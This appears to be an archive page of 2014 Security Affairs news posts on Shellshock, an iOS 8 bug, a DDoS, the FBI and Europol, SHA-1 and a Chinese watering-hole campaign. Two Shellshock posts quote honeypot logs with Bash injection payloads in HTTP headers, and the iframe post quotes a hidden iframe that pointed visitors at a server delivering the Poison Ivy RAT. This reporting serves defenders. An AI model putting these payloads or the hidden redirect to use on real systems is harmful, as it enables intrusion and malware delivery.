Skip to content
Oct 2 14

DARPA ASOM technology identifies counterfeit microelectronics

by Pierluigi Paganini
ASOM technology DARPA

DARPA announced the deployment of the ASOM technology which will be used to inspect critical equipment to detect counterfeit microelectronics.

The presence of counterfeit microelectronics in cybersecurity equipment is considered a critical problem for the US Government, in military sector the hardware qualification has assumed a crucial importance for national cyber security strategy.

The US DARPA supports the development of the Integrity and Reliability of Integrated Circuits (IRIS) program to prevent the diffusion of counterfeit microelectronics in US military systems. The IRIS program started in to improve hardware qualification in the military industry, the scope is the identification of any anomaly in the IC present in critical equipment.

The official post published by DARPA highlights the dramatic growth of the worldwide IC market in the last decades, in 2013, the import value of integrated circuits was $231 billion, up 20 percent from the previous year. The majority of microelectronics in cybersecurity equipment is today manufactured in the far East to reduce the costs, but in several cases security experts have raised doubts in the integrity of circuitry components.

Researchers with SRI International, an IRIS performer, have announced they have provided Advanced Scanning Optical Microscope (ASOM) technology to the Naval Surface Warfare Center (NSWC) in Crane, Indiana.

ASOM technology DARPA 2

The US Government has designed over the years, numerous forensics tools for the analysis of microelectronic provided by military partners. The laboratory equipment used by experts under the Integrity and Reliability of Integrated Circuits (IRIS) program allows engineers to scan components of sophisticates circuits present in any kind of devices used in military and other critical sectors.

The ASOM technology allows the inspection of integrated circuits (IC) with impressive precision by scanning them with a narrow infrared laser beam. The ASOM technology could be used by law enforcement to inspect equipment under investigation, allowing detection of counterfeit microelectronics.  The ASOM is able to probe microelectronic circuits at nanometer levels, revealing information about chip construction as well as the function implemented by the circuits of the component at the transistor level.

“The Advanced Scanning Optical Microscope—one of many IRIS-developed technologies—offers important hardware security and reliability assurance capabilities,” said Kerry Bernstein, DARPA program manager. “These tools are optimized to support the mission of ensuring trust in microelectronics in DoD labs such as NSWC Crane.”

As explained in the blog post published by DARPA, military demand for integrated circuits (IC) is a small part of the overall market, neraly one percent, for this reason DoD has limited ability to influence global production.

“Without the ability to influence and regulate the off-shore fabrication of IC, there is a risk that parts acquired for DoD systems may not meet stated specifications for performance and reliability,” said Bernstein. “This risk increases considerably with the proliferation of counterfeit IC in the marketplace.”

The ASOM technology is considered a success for the agency due to its inspection capabilities which allow engineers to conduct nondestructive tests and identify counterfeit components, essential for the design of the nation’s weapons and other critical systems.

Pierluigi Paganini

(Security Affairs – DARPA, ASOM)

Oct 1 14

Flawed iOS 8’s Reset All Settings Option erases iCloud Docs

by Pierluigi Paganini
ios 8 problem reset settings 2

The MacRumors forum reported a serious flaw in iOS 8’s ‘Reset All Settings’ Option which causes the deletion of iCloud Drive documents.

The Fappening case has raised the question about the level of security offered by iCloud and other cloud storage services. Apple was criticized for the way its security experts managed the flaw in iCloud file storage service that, according to multiple sources, was exploited by hackers to steal nude photos of celebrities. The company has announced and implemented a series of security improvements to protect the users’ privacy with the new version of mobile operating system, iOS 8.0.1, including data encryption by default and two-factor authentication for the iCloud service.

But it would seem that the problems for Apple have not even finished with the launch of the new iOS 8 system, because experts discovered a new critical bug in the new mobile OS. The new critical vulnerability discovered in iOS 8.0.1 seems to be deleting data stored in the cloud without the user’s permission. The bug was first disclosed by MacRumors in a post titled “Bug in iOS 8’s ‘Reset All Settings’ Option Also Erases iCloud Drive Documents“, which reported the alert issued by many members of the popular forum.

“It appears that there may be a serious bug with the “Reset All Settings” option in iOS 8, causing users who activate the feature to lose all of their iWork documents stored in iCloud Drive. According to multiple posters on the MacRumors forums, using the “Reset All Settings” option under General –> Reset has caused documents to be permanently deleted from iCloud Drive. ” states the post.

The “Reset All Settings,” option is typically used to reset user’s network settings, but it seems that the functionality also deleting all user’s files from iCloud Drive. The effect is not intentional as reported under the General category in Settings for iOS 8, the Reset All Settings option is supposed to reset iOS device settings while retaining user’s data and media, as the option explicitly states that “No data or media will be deleted.

ios 8 problem Reset All Settings

Many users experienced the inconvenience, their documents were wiped out after users press the Reset All Settings button. According to the forum members, the problem is related to documents from iWork apps, such as Pages, Numbers and Keynote.

“In our own testing, using “Reset All Settings” deleted all iWork documents stored in iCloud Drive on the iPhone and on iCloud.com. After allowing time for syncing to a Mac running OS X Yosemite, all of the documents disappeared from that machine as well. Preview and TextEdit documents, which cannot be accessed on the iPhone, remained untouched on the Mac.” reported MacRumors as result of its test in the flaw.

Waiting for the fix from Apple, iOS 8 users are advised to avoid the use of the “Reset All Settings” option  feature.

“Users who have iCloud Drive enabled may want to refrain from using the “Reset All Settings” option on their devices for the time being, in order to avoid accidentally erasing important documents stored in iCloud Drive.” closes the post on MacRumors.

Pierluigi Paganini

(Security Affairs – iCloud , Reset All Settings)

Oct 1 14

Ello Social Network knocked down by a cyber attack

by Pierluigi Paganini
ello

Ello, the new social network which is considered the anti-Facebook, was knocked down on Sunday by a distributed denial of service (DDoS) attack.

In these days, many articles reported the born of Ello, a new social network considered as a possible antagonist of the giant Facebook. Ello creator considers it as a “tool for empowerment” highlighting how similar social media could be used to manipulate people.

The manifesto of the Ello social network says “a social network can be a tool for empowerment. Not a tool to deceive, coerce and manipulate — but a place to connect, create and celebrate life.”

Ello is an invite-only social network, the company is advertising this characteristic in attempting to attract users from other important social media platform. Its creator promises a network free from ads and that has a great respect for the user’s privacy. It’s not a mystery that data collected by social media are used as precious commodities by private companies that analyze them to customize commercial offers and do any kind of research.

Last week Ello social network reached a peak of popularity as explained by the founder Paul Budnitz told Business Insider. This rapid growth is probably annoying someone and is attracting the attention of the cybercrime.

“We’re up to 38,000 signups per hourrecently,” said Budnitz.

Last Sunday Ello social network suffered a major distributed denial of service (DDoS) attack, the attack started late on Sunday evening (CET time) and Ello platform was not accessible for over 30 minutes. The network posted a message on its status page confirming the ongoing attack:

ello ddos

“Investigating – We are undergoing a potential denial of service attack.” states the message from the company.

The company has identified the sources of the DDoS attack and has blocked IPs involved in the offense, but as happens in these cases is a temporary countermeasure, which does not protect Ello from future attacks. Many experts have speculated on the possibility that the attack was commissioned by a competitor or which may have been a intimidating action for purposes of extortion.

As the popularity of Ello continues to grow, it will likely face more DDoS like this, this kind attacks is very easy to manage and the underground offers any king of product and service to arrange them.

DDoS attack is a very effective method to bring down a website and can be carried out by threat actors without any particular expenses.

In time I’m writing, no one had claimed responsibility for DDoS attack against Ello systems.

Pierluigi Paganini

(Security Affairs – Ello, DDoS)

Oct 1 14

FBI opens its Malware Investigator portal to the private industry

by Pierluigi Paganini
Malware Investigator

The FBI Operational Technology Division which is responsible for malware analysis opens its Malware Investigator portal to the private industry.

The FBI has opened its Malware Investigator portal to industry in order to information sharing on this type of cyber threat and to improve incident response in case  of attacks against. The FBI hopes to speed up investigation process in case of attack and allow private companies to autonomously respond to infection based on a new strain of malware without heavy reverse-engineering loads.

“Malware Investigator is a tool that provides users the ability to submit suspected malware files and within as little as an hour, receive detailed technical information about what the malware does and what it may be targeting.” states the official Malware Investigator portal.

During the ceremony for the launch of the Malware Investigator portal, the Information crime unit chief Steve Pandelides explained the positive impact for both law enforcement and the private sector. Private companies will have more information related to the specific infection and will be able to quickly mitigate the threat, on the other side the FBI will have the opportunity to assess real time the incident and monitor their evolution in the various industries.

“After submission, the report can get turned around in a matter of minutes to a matter of hours,” Pandelides said. “It will enable our private partners to protect their company’s networks and help our state and local law enforcement partners further their investigations. “It will also provide the FBI a global view of the malware threat.”

Malware Investigator portal API

Malicious codes submitted to the Malware Investigator portal would be correlated against other submissions and analyzed by the FBI’s intelligence which will produce detailed reports. Initially, it will work for Windows malware and it would be expanded to collect also other families of malicious code. This kind of analysis has an immense value for malware analysts that could be able to track the evolution of malicious code in time, and track capabilities of APT and hackers behind the malicious campaign.

Malware Investigator slide

Recently I introduced you the excellent work done by the independent researcher Brandon Dixon which has analyzed for years the metadata on submissions to VisusTotal service identifying patterns related to many bad actors.

“The analysis conducted by Dixon on has an immense value, from the observation of VirusTotal submission over the time it is possible to understand how hackers work, which improvement they have made for their code and which is their cyber capabilities. These information allows analysts to track a profile of the threat actors which could help to solve problem of attribution in case of attack, improve the detection capabilities and prediction of further offensives.” I wrote.

Malware would be analyzed in part through fuzzy hashing including section hashing, virus scanning cluster, file system modification, sandboxing and others.

The FBI opened API access for organizations which plan to to integrate the system into their architecture, in this way private entities could benefit of the research made by the FBI with its analytic tools, including an automated malware analysis system, known as Binary Analysis Characterization and Storage System (BACSS), that is now used by the bureau enterprise wide.

The BACSS system provides the FBI’s investigators and security experts with technical information about the malicious code used in the attack as well as correlation with other infections.The Bureau’s Jonathan Burns explained during the Virus Bulletin conference in Seattle last week that based on the success of BACSS, the FBI approved the development of a second unclassified malware analysis system, Malware Investigator.

As explained by law enforcement the FBI began manual malware analysis in 1998 and over subsequent years it has designed its own tools to analyze the threats.

The Malware Investigator portal will help the FBI to raise awareness and share the results of its research with industry.

Pierluigi Paganini

(Security Affairs – Malware Investigator portal, FBI)

Sep 30 14

Europol issued 2014 iOCTA report on evolution of cybercrime

by Pierluigi Paganini
iocta 2014

The Europol issued 2014 Internet Organised Crime Threat Assessment (iOCTA) report to provide details about on-going developments in the cyber criminal ecosystem.

The Europol European Cybercrime Centre (EC3) has issued the 2014 Internet Organised Crime Threat Assessment (iOCTA) which describes the evolution of cybercrime an the models of sales adopted in the criminal ecosystem.

This ‘Crime-as-a-Service‘ business model is considered a winning choice for the cybercrime ecosystem, the model in fact is able to ensure “innovation and sophistication” of the solutions offered. With the adoption of this business model, the entry barriers into cybercrime are being lowered, allowing criminals with low technical expertise to venture into cybercrime.

“These days, almost anyone can become a cyber-criminal. This puts an ever increasing pressure on law enforcement authorities to keep up. We need to use our new knowledge of how organised crime operates online to launch more transnational operations. We need to ensure that investigations into payment card fraud and online child abuse don’t stop at national borders,” says Cecilia Malmström, Commissioner Home Affairs.”

The document explains how the organised crime is leveraging underground forums, black markets, deep web and crypto currency schema to conduct illicit activities. Money laundering, data theft and child pornography, are a few examples of the illegal activities contrasted by the Europol.

“A professional, continuously evolving service-based criminal industry drives the innovation of tools and methods used by criminals and facilitates the digital underground through a multitude of complementary services, extending the attack capacity to those otherwise lacking the skills,” states the iOCTA report.“Traditional organised crime groups (OCGs), including those with a mafia-style structure are beginning to use the service-based nature of the cyber crime market to carry or more sophisticated crimes [by] buying access to the skills they require.”

The document issued by the Europol remarks the important role of Europol’s EC3 in the fight against cybercrime, highlighting its crucial role in the joint, multi-national operations that modern cybercrime investigations demand.

EUROPOL IOCTA 2014

The Darknets are privileged places in the cyberspace to offer any kind of illegal products and services, a growing number of criminal gangs exploit anonymity offered by such networks to arrange their activities.

“Child sex offenders and producers make increasing use of the dark net and other similar areas. New forms of child sexual exploitation online such as the live streaming of on-demand abuse of children present new challenges for law enforcement.”

Anonymizing networks, like Torare used to host black market places where criminals sale drugs, weapons and hacking services.

New paradigms like the Internet of Things (IoT) and cloud computing are offering new opportunity for criminals:

“The advent of the Internet of Everything, combined with the ever-increasing number of internet users globally creates a broader attack surface, new attack vectors and more points of entry,” read the report.

I have reached Troels Oerting, Head of Europol’s European Cybercrime Centre (EC3) requesting for a comment.

“The Internet is a wonderful invention. It will create growth and prosperity and enable all levels of society to access and share. But it is also a very dangerous place and crime in cyberspace is booming. The area attracts new and old criminal networks taking advantage of the easy access to victims, high profit and low risk of being caught. We need to change this. And we need to start discussing how. Freedom is never free.” said Troels Oerting.

iocta 2014 Europol

The 2014 iOCTA also provides a set of recommendations for law enforcement to successfully address cyber criminal activities, it highlights the importance for a public and private partnerships and co-operation in the fight to the cybercrime. The recommendations include:

  • Prevention – Awareness
  • Prevention – Capacity Building & Training
  • Partnerships
  • Protection
  • Investigation

Information sharing is a crucial aspect of the challenge to the cybercrime,  cooperation with other entities it essential in this delicate moment.

Pierluigi Paganini

(Security Affairs – Europol, iOCTA)

Sep 30 14

Apple released a patch for the Shellshock vulnerability

by Pierluigi Paganini
bash bug patch Apple

Apple has just released its patch for the Shellshock vulnerability. The company provided an update for the OS X Lion, Mountain Lion and Mavericks.

A few days ago the Internet community was shocked by the revelation on a new critical flaw, dubbed Bash Bug, which affects the Bash component in billion of Unix and Linus systems worldwide. Apple after a rapid verification, released an official statement to reassure its Mac OS X users, the company declared that the vast majority of Mac computers are not at risk from the Bash Bug, aka the “Shellshock” bug:

The vast majority of OS X users are not at risk to recently reported bash vulnerabilities,” states the Apple public statement.”Bash, a UNIX command shell and language included in OS X, has a weakness that could allow unauthorized users to remotely gain control of vulnerable systems. With OS X, systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services. We are working to quickly provide a software update for our advanced UNIX users.“ states the company announcement.

Resuming the majority of Apple OS X users were considered to be safe by the company so long as they haven’t configured any advanced access to their systems. The statement was criticized by IT security communitydue to the false sense of security he gave to the MAC OS X users, because their systems were anyway vulnerable to the Bash Bug. To avoid problems I suggested to Apple OS X users to disable any advanced UNIX options waiting for the patch will be issued.

The Shellshock patch arrived tonight, the updates are available for the following OS versions:

Unfortunately threat actors just after the disclosure of the Shellshock were trying to exploit Bash Bug flaw, scanning of the entire Internet to identify vulnerable machines and run the exploits.

The security firm Incapsula reported that in a 12-hour period, its systems recorded 725 attacks, originated from 400 unique IP addresses mainly located in US and China,  per hour against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said. 

“In the four days that have passed since the Shellshock vulnerability disclosure, Incapsula’s web application firewall has deflected over 217,089 exploit attempts on over 4,115 domains.During this period the average attack rate has nearly doubled, climbing to over 1,970 attacks per hour. As of this time, Incapsula’s system has documented Shellshock attacks originating from over 890 offending IPs worldwide.” states a blog post from Incapsula

ShellShock Incapsula data before Apple release patch

Also experts at AlienVault confirmed that the disclosure of the flaw has triggered numerous attack, the team is running a new module in their honeypots to track the attempts exploiting the ShellShock bug and in just 24 hours they detected several hits. The majority of attacks is scanning the Internet simple sending a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138

The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different strains of malware on the victims.

The majority of the attacks aim to gain shell on a vulnerable machine in order to hijack it, according to data provided by Incapsula nearly 18.37 percent of the attacks are attempts to establish remote access and use it to hijack the server (e.g., using Python or Perl scripts), meanwhile DDoS Malware account for 16.64 percent.

Don’t wasts time update your system!

Pierluigi Paganini

(Security Affairs – Apple, Shellshock )

Sep 30 14

A mobile spyware used to track activists in Honk Kong

by Pierluigi Paganini
hong kongspyware

A Fake Occupy Central app containing a spyware is used by unknown to track activists in Hong Kong. Evidences suggest the involvement of Chinese entities.

A Fake Occupy Central app is targeting the smartphones of the activists belonging to the Occupy Central pro-democracy movement with spyware. The malicious app  has circulated online claiming to be an instrument to coordinate the members of the Occupy Central pro-democracy movement. In time I’m writing it is not clear the number of mobile users infected by the app.

The spyware is disguised as an Android App, dubbed Code4HK, designed by a group of coders trying to improve government transparency in Hong Kong.

Code4HK spyware malware

The threat actor behind the malicious app sent a link the application in classic phishing messages to the targeted members of the movement, the messages are sent from an unknown phone number unknown with the following text.

“Check out this Android app designed by Code4HK for the coordination of Occupy Central!” the message read.

Lau Sau-yin, a spokeswoman for Occupy Central, officially warned people to avoid the install the application because it hides a spyware. Code4HK also revealed that its development team was not involved in the development neither the distribution of the application.

“None of the Code4HK community has done any application on [Occupy Central] at the moment nor sent the message,” the statement read. 

Regarding the nature of the Android Applicatio, Code4HK suggested the application was generic spyware.

“I agree it looks quite off the shelf, not specialised for us,” said Vincent Lau Chun-yin, a member of the group.

The malicious app, like many other spyware, once downloaded access to the user’s information stored in the devices, including contacts, phone call history, location, browsing history and SMS.

Siu Cheong Leung, a senior consultant with the Hong Kong Computer Emergency Response Team Coordination Centre, confirmed that the application is able to record audio from the surrounding environment making it ideal for surveillance activities.

“On the face it is not suspicious,” he added. “However once it is installed, it will unpack data from itself to install a second mobile app,” which then connects to a server based in South Korea. 

The server ,which was used by bad actors to host the C&C, has a log-in in simplified Chinese,  a language mainly used in China.

The attribution is still a mystery, it is difficult to imagine who has deployed the malware, for sure someone who is very interested in the situation in Hong Kong.

Pierluigi Paganini

(Security Affairs – Hong Kong, spyware)

Sep 29 14

SHA-1 has been deprecated, what can I do?

by Pierluigi Paganini
sha-1 encryption

The SHA-1 cryptographic hash algorithm has been known vulnerable, Collision attacks against it are too affordable and attacks will get cheaper soon.

Many websites today are using digital certificates signed using algorithms based on the hash algorithm called SHA-1. Hashing algorithms are used to ensure the integrity of the certificate in the signing processes, a flawed algorithm could allow an attacker to forge fraudulent certificates.

In the past collision attacks against the MD5 hash algorithm allowed threat actors to obtain fraudulent certificates, security experts want to avoid similar problems for SHA-1.

Principal vendors are working to phase out support for the SHA-1 hash algorithm which is vulnerable to collision attacks that will be soon possible, in 2012 experts demonstrated how breaking SHA1 is becoming feasible, in November 2013, Microsoft announced that they will phase out SHA1 certificates after 2016.

“. Collision attacks against SHA-1 are too affordable for us to consider it safe for the public web PKI. We can only expect that attacks will get cheaper.” states Google in an official statement on the topic. SHA-1’s use on the Internet has been deprecated since 2011, when the CA/Browser Forum, an industry group of leading web browsers and certificate authorities (CAs) working together to establish basic security requirements for SSL certificates, published their Baseline Requirements for SSL. These Requirements recommended that all CAs transition away from SHA-1 as soon as possible, and followed similar events in other industries and sectors, such as NIST deprecating SHA-1 for government use in 2010.

To have an idea of the impact for the deprecation of SHA-1 let’s analyze the data provided by the SSL Pulse which confirms that only 14,8 % sites use SHA256 certificates in September 2014.

Sha-1 diffusion Settembre 2014

“A collision attack is therefore well within the range of what an organized crime syndicate can practically budget by 2018, and a university research project by 2021.” said the expert Bruce Schneier.

The decision of Microsoft is shared among other IT giants, like Mozilla and Google, the popular search engine, for example, will penalize websites that use SHA1 certificates that expire during 2016 and after.

Certification Authorities (CAs) and Web site administrators have to upgrade their digital certificates to use signature algorithms different from SHA-1, valid alternatives could be SHA-256, SHA-384, or SHA-512.

“Sites with end-entity certificates that expire between 1 January 2016 and 31 December 2016 (inclusive), and which include a SHA-1-based signature as part of the certificate chain, will be treated as “secure, but with minor errors”.  Sites with end-entity certificates that expire on or after 1 January 2017, and which include a SHA-1-based signature as part of the certificate chain, will be treated as “affirmatively insecure”. Sub resources from such domain will be treated as “active mixed content”. The current visual display for “affirmatively insecure” is a lock with a red X, and a red strike-through text treatment in the URL scheme.” states the blog post published by Google titled “Gradually sunsetting SHA-1“.

Mozilla has aligned its position on the acceptance for SHA-1 based certificates,  the company should not be issued after January 1, 2016, or trusted after January 1, 2017. The section 8 of the Mozilla’s CA Certificate Maintenance Policy states:

“We consider the following algorithms and key sizes to be acceptable and supported in Mozilla products: SHA-1 (until a practical collision attack against SHA-1 certificates is imminent)NIST Guidance recommended that SHA-1 certificates should not be trusted beyond 2014. However, there are still many Web sites that are using SSL certificates with SHA-1 based signatures, so we agree with the positions of Microsoft and Google that SHA-1 certificates should not be issued after January 1, 2016, or trusted after January 1, 2017. In particular, CAs should not be issuing new SHA-1 certificates for SSL and Code Signing, and should be migrating their customers off of SHA-1 intermediate and end-entity certificates. If a CA still needs to issue SHA-1 certificates for compatibility reasons, then those SHA-1 certificates should expire before January 2017. More information is available in Mozilla’s list of Potentially Problematic CA Practices.”

To be aligned with suggestions provided by the NIST and IT giants I recommend you to:

  • Inventory your existing digital certificates, in complex environments, this task could be done automatically using specific tools that scan the entire company network.
  • Replace SHA1 certificates that expire after 2015; A good policy could be to start from the most valuable websites for the company business and those website using certificates that expire after 2016.
  • Assess those server platforms which might not be able to support SHA256, or superior, certificates (e.g. Windows Server 2003). These systems might require an upgrade or a patching activity.

Pierluigi Paganini

(Security Affairs – SHA-1, digital certificates)

Sep 29 14

iFrame-based redirection attacks used to monitor Chinese organizations

by Pierluigi Paganini
Iframe redirection hit chinese entities

Security Experts at FireEye discovered a new malicious campaign which is targeting Chinese organizations with iFrame traffic redirection to serve RAT.

Security experts at FireEye observed a new malicious campaign that is targeting non-profit organizations and non-governmental organizations by compromising legitimate website.

The threat actors use to compromise legitimate websites to host iframes used to hijack visitors to a threat actor-controlled IP address that serves a Poison Ivy remote access tool (RAT). Experts at FireEye discovered evidence of the involvement of the Sunshop Digital Quartermaster, a known collective of malware authors which provided malicious code used by different China-based APT groups.

FireEye previously identified this specific RT_MANIFEST as the ‘Sunshop Manifest,’ and we have observed this same manifest resource used in 86 other samples. As we stated in the Quartermaster report, we believe this shared resource is an artifact of a builder toolkit made available to a number of China-based APT groups.” states the report published by FireEye

The experts identified a similar attack pattern for the “hack” of at least three different websites: an international non-profit organization and two different non-governmental organizations.

The APT behind the attacks injected the malicious iframes on the targeted websites, in two cases it also obfuscated them.

<div class=”views-field views-field-body”>
<div class=”field-content”><p>
<iframe height=”0″ src=”http://103.27.108.45/img/js.php” width=”0″></iframe></p>

The iframes allow attacker to redirect visitors to a website hosting a Java exploits (103.27.108.45) which downloads and decodes a variant of Poison Ivy hosted at: hxxp:img//103.27.108.45//js.php.

It is interesting to note that to improve evasion capability of the RAT, the threat actor has also signed the code using the following digital certificate.

“Installation of certain types of software (e.g. application updates) its code to be digitally signed with a trusted certificate. For this reason, cyber criminals and other bad actors have started to target entities managing digital certificates. By stealing a digital certificate associated with a trusted vendor and signing malicious code with it, it reduces the possibility that a malware will be detected as quickly.” I wrote in a post on the misuses of digital certificates.

The attackers attempted to masquerade the malicious code as a Google Chrome file, but they misspelled multiple words.

The experts believe that the malicious campaign started compromising websites belonging to NGOs and non-profits to target other organizations in the same industries.

ChineseHacker iFrame

Technically the attackers are exploiting watering hole attacks to compromise organization employees and other organizations in the same industries, it is likely that Chinese hackers are working for the Government in surveillance activities.

“We suspects threat actors sought to monitor these programs and involved individuals. The three organizations whose websites are hosting the malicious iframes have China-based operations.” states the reports.”FireEye expects threat actors are motivated to steal programmatic data and monitor organizations’ programs in specific countries. If China-based threat actors are behind the observed campaign, FireEye expects that organizations with operations in China are high-priority targets.”

Anyway, not only those industries are affected by iFrame based attacks, the technique is very common in cyber criminal ecosystem and largely adopted also for financial motivated attacks.

Pierluigi Paganini

(Security Affairs – iframes, ATP)

Sep 28 14

ShellShock could be used to hack VoIP systems

by Pierluigi Paganini
VOIP shellshock VoIP

Jaime Blasco at AlienVault Labs explained that ShellShock vulnerability could be  exploited to hack Voice over IP systems worldwide.

The Shellshock Bash is monopolizing the debate on the Internet security in these days, every vendor is assessing its product to verify the impact of the critical vulnerability Bash Bug (CVE-2014-6271). Apple recently announced that its Mac OS X based computers are safe by default meanwhile Oracle announced that at least 32 of its solutions are affected.

As I explained several times, the impact of Shellshock Bash is really serious, an impressive amount of devices and service run vulnerable software that are not easy to update, let’s think, for example to IoT devices or voice-over-IP (VoIP) phone systems.

Today we will talk about the exposure of VOIP systems to the Shellshock Bash, compromising these systems threat actors could access to business communication systems with serious repercussion for enterprise security.

The Shellshock Bash bug affects also VoIP phone vendor’s session initiation protocol (SIP) server as revealed by the director of AlienVault Labs, Jaime Blasco, and as usually happen the flaw is likely widespread because many vendors use similar architectures.

“I’m pretty sure that there are a bunch of them (vendors), if not a lot of them, that you can exploit,” Blasco said declining to name the vendor.

The main component of VoIP systems is the SIP server, which often runs on Unix or Linux, another critical component is such architecture is the media server. While the media server implements media management functionalities, such as the transmission of the audio, the VoIP server is typically used to manage users’ configuration and phone hardware managements.

shellshock-command-diagram-600px

Unfortunately a large number of SIP servers run GNU BASH which is affected by the Shellshock vulnerability, this means that an attacker could exploit it to execute malicious commands by sending them via the Common Gateway Interfaceof the SIP server’s administrative interface.

“Even if you don’t have the username and password (for the SIP server), you can exploit the vulnerability,” Blasco said.

The possibility for at attacker are different, threat actors could exploit the Shellshock flaw to change the configuration of the VoIP systems, to add and remove new users and hardware to the system, or to serve a malware to the SIP server and gain access to a company network.

The attacks to VoIP systems are very common, phone systems are privileged targets for hackers that intend to spy on communications of the targeted organization.

The disclosure of the Shellshock flaw has triggered a series of attacks on a large scale, security researchers reported that bad actors were trying to exploit Bash Bug flaw worldwide.

Security firm Incapsula reported that in a 12-hour period, its systems recorded 725 attacks, originated from 400 unique IP addresses mainly located in US and China,  per hour against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.

Typically attackers run scanning of the entire Internet to identify vulnerable machines and run the exploits, their purpose is compromise targeted machines to recruit in botnet.

Experts at AlienVault are running a new module in their honeypots to track the attempts exploiting the ShellShock bug, in just 24 hours they detected several hits.

The majority of attacks is scanning the Internet simple sending a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138

The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different pieces of malware on the victims and it is just the beginning!

Pierluigi Paganini

(Security Affairs – ShellShock, Linux)